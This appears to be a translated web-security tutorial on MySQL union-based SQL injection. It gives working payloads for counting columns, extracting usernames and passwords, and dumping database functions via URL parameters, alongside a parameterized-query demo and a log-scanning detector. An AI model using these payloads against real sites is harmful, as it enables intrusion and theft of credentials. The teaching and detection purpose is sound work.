SQL injection for Web Security (2)
2022-07-02 00:55:00 【Global variable Global】
This article explains SQL injection in web security in detail. By getting a deeper grasp of the principle and detection method of SQL injection covered here, it can be put to better use in penetration testing. The content is compiled from my own understanding; if there are mistakes, please go easy on me, as my skills are limited. Every technique mentioned in this article comes from practice on a test range and is for reference only. Do not use the techniques in this article for illegal testing; the author bears no responsibility for any adverse consequences caused by doing so.
Web security: SQL injection (2)
union select: union query injection
Principle
In union injection, we usually use union select to attach our own query to the original statement.
select * from users where user_id=1
When we use union select for a union injection, if the number of columns on the two sides does not match, an error is raised.
Here the users table and the guestbook table have different numbers of columns, so an error occurred.
In MySQL we can use 1,2,3,4,5,6 to stand in for the columns, but before that we need to determine the number of columns.
Once we determine that there are 8 columns, both sides have the same number of columns and the page displays correctly.
select * from users where user_id=1 order by 8
When we replace one of these numbers with a MySQL built-in function, the data we need appears in that position.
select * from users where user_id=1 union select 1,2,3,user(),5,6,7,8
Similarly, we can also name the columns directly.
select * from users where user_id=1 union select 1,2,3,4,5,6,user,password from users
If we need to display only one row, we can also use limit to control it. Usually we use a negative number or NULL for the id, because select * from users where user_id=1 itself returns a record, so we replace it with a nonexistent record; that way the data returned by the following statement is displayed conveniently.
select * from users where user_id=-1 union select 1,2,3,4,5,6,user,password from users limit 0,1
Usage of limit: when only one row needs to be displayed, syntax such as limit 1,1 or limit 2,1 can be used.
limit 1 = limit 0,1 # represents one row
limit 2 = limit 0,2 # represents two rows
limit 1,1 # represents the second row only
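The following Python script is an added example and is not code from the original article. It reproduces the pattern the text describes (a request parameter pasted between single quotes, a nonexistent id, a UNION whose column count matches the original query, the limit 0,1 form, and a trailing comment that swallows the closing quote from the code) against a constructed in-memory SQLite database, so it runs offline. It assumes a shortened users table with five columns instead of the eight in the text, uses SQLite rather than MySQL (so the MySQL built-ins user(), database() and version() are not used), and places each input beside the parameterized query that removes the problem.

```python
import sqlite3

# Constructed in-memory sample data (assumption: a shortened version of the
# users/guestbook tables the text refers to; password hashes are placeholders).
SCHEMA = """
CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT);
CREATE TABLE guestbook (comment_id INTEGER, comment TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', 'hash-placeholder-1');
INSERT INTO users VALUES (2, 'gordonb', 'Brown', 'gordonb', 'hash-placeholder-2');
INSERT INTO guestbook VALUES (1, 'hello');
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_vulnerable(conn, user_input):
    # The pattern the text analyses: the request parameter is pasted between
    # single quotes, so a quote in the input ends the literal and the rest is SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_input + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, user_input):
    # Hardened form: the value is bound as a parameter and is never parsed as SQL,
    # so there is no quote to close and no comment to append.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_input,)).fetchall()

# Inputs shaped like the text's payloads: a nonexistent id (-1) so only the
# union rows show, a two-column union to match the two selected columns,
# the MySQL-style "limit 0,1" (SQLite accepts the same offset,count form),
# and a trailing "-- " comment that hides the closing quote from the code.
UNION_INPUT = "-1' UNION SELECT user, password FROM users -- "
UNION_LIMIT_INPUT = "-1' UNION SELECT user, password FROM users LIMIT 0,1 -- "

def compare(user_input):
    """Run one input through both lookups; return (vulnerable_rows, parameterized_rows)."""
    conn = open_db()
    try:
        vulnerable = lookup_vulnerable(conn, user_input)
        parameterized = lookup_parameterized(conn, user_input)
    finally:
        conn.close()
    return vulnerable, parameterized

def column_count_matches(conn, n):
    """The text's ORDER BY check: does the vulnerable query accept ORDER BY position n?"""
    try:
        lookup_vulnerable(conn, "1' ORDER BY %d -- " % n)
        return True
    except sqlite3.OperationalError:
        # SQLite reports an out-of-range ORDER BY term, as MySQL reports an unknown column.
        return False

if __name__ == "__main__":
    conn = open_db()
    print("ORDER BY 2 accepted:", column_count_matches(conn, 2))
    print("ORDER BY 3 accepted:", column_count_matches(conn, 3))
    conn.close()
    for label, inp in (("normal", "1"), ("union", UNION_INPUT), ("union+limit", UNION_LIMIT_INPUT)):
        vuln, safe = compare(inp)
        print(label, "| vulnerable:", vuln, "| parameterized:", safe)
```

Running it shows the same input producing two outcomes: the concatenated query returns the user and password columns from every row (one row with the limit form), while the parameterized query treats the whole string as a literal id, finds no such row, and returns nothing, with no error to guide further probing.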
Code analysis
After understanding the principle above, we analyze the code that is vulnerable to SQL injection.
Vulnerability demonstration
After analyzing the source code, it meets the two conditions for producing an SQL injection vulnerability, so we can use the union query we have learned to test it.
In our analysis there is an error-reporting function and no filtering of the input, so here we can test directly with a single quotation mark.
When we use a single quotation mark, it directly returns the error information. We judge that there may be injection here.
Because the analysis shows the parameter is a string type, quotation marks are needed when testing.
?id=1' and '1'='1' -- &Submit=Submit#
?id=1' and '1'='2 &Submit=Submit#
Here I use two methods to test, mainly to illustrate the closing problem. In the source code above you can see that there is a single quotation mark after id, so when we supply all the single quotation marks ourselves we need to use a comment, whose purpose is to comment out the single quotation mark in the original code. If there is no single quotation mark after our input, the program closes the single quotation mark in the code with our input statement. That is the principle behind adding a comment or not.
It can be seen that the two results are completely different, which basically confirms that there is injection, so we directly use the union query to obtain the data.
We can also print several built-in functions at once by concatenating them into one string with group_concat.
?id=-1' union select 1,group_concat(user(),0x3A,database(),0x3A,version())--
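As an added example from the detection side (not part of the original article), the Python script below runs the request patterns this section describes, the single-quote probe, the '1'='1' comparison, the order by count, the union select, the 0x hex literal and the trailing comment, over a few constructed Apache-style access-log lines. The path /app/item.php, the client address and the timestamps are made up. Pattern matching of this kind only flags the plainest probes; encoding and keyword-splitting variants get past it, so it is a triage signal to pair with database error logging and parameterized queries, not a control on its own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache-style). Host, path, client address
# and timestamps are made up; the query strings encode the probes the text shows.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jul/2022:00:55:01 +0800] "GET /app/item.php?id=1&Submit=Submit HTTP/1.1" 200 4213
10.0.0.5 - - [02/Jul/2022:00:55:07 +0800] "GET /app/item.php?id=1%27&Submit=Submit HTTP/1.1" 200 1002
10.0.0.5 - - [02/Jul/2022:00:55:12 +0800] "GET /app/item.php?id=1%27+and+%271%27%3D%271%27+--+&Submit=Submit HTTP/1.1" 200 4213
10.0.0.5 - - [02/Jul/2022:00:55:20 +0800] "GET /app/item.php?id=1%27+order+by+8+--+&Submit=Submit HTTP/1.1" 200 4213
10.0.0.5 - - [02/Jul/2022:00:55:31 +0800] "GET /app/item.php?id=-1%27+union+select+1%2Cgroup_concat%28user%28%29%2C0x3A%2Cdatabase%28%29%29--&Submit=Submit HTTP/1.1" 200 4301
"""

# Client address and request target from a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Each rule is (name, regex) applied to one normalized parameter value.
RULES = [
    ("quote_probe",    re.compile(r"^\d+'$")),                          # id=1'
    ("boolean_test",   re.compile(r"\b(and|or)\s+'?\d+'?\s*=\s*'?\d+")),  # and '1'='1
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),              # order by 8
    ("union_select",   re.compile(r"\bunion\s+(all\s+)?select\b")),     # union select
    ("hex_literal",    re.compile(r"\b0x[0-9a-f]{2,}\b")),              # 0x3A separator
    ("comment_tail",   re.compile(r"(--|#)$")),                         # trailing comment
]

def normalize(value):
    # Lower-case and collapse whitespace so spacing does not split a keyword pair.
    return re.sub(r"\s+", " ", value).strip().lower()

def flag_value(raw):
    """Return the names of every rule that matches one decoded parameter value."""
    v = normalize(raw)
    return [name for name, rx in RULES if rx.search(v)]

def scan(log_text):
    """Return [(line_no, client_ip, param, rules)] for every suspicious parameter."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        # parse_qs undoes %XX escapes and turns '+' back into spaces.
        for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
            for raw in values:
                rules = flag_value(raw)
                if rules:
                    findings.append((n, client, param, rules))
    return findings

if __name__ == "__main__":
    for line_no, client, param, rules in scan(SAMPLE_LOG):
        print("line %d client %s param %s: %s" % (line_no, client, param, ", ".join(rules)))
```

The benign first request produces no finding; the four probes that follow are each flagged, and the sequence from one client (quote, boolean pair, order by, union) is the shape a reviewer would escalate on rather than any single hit.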
Because MySQL version 5 and above ships with a built-in information_schema database that holds all database names, table names and field names, we can query in combination with that database. That syntax will not be introduced here.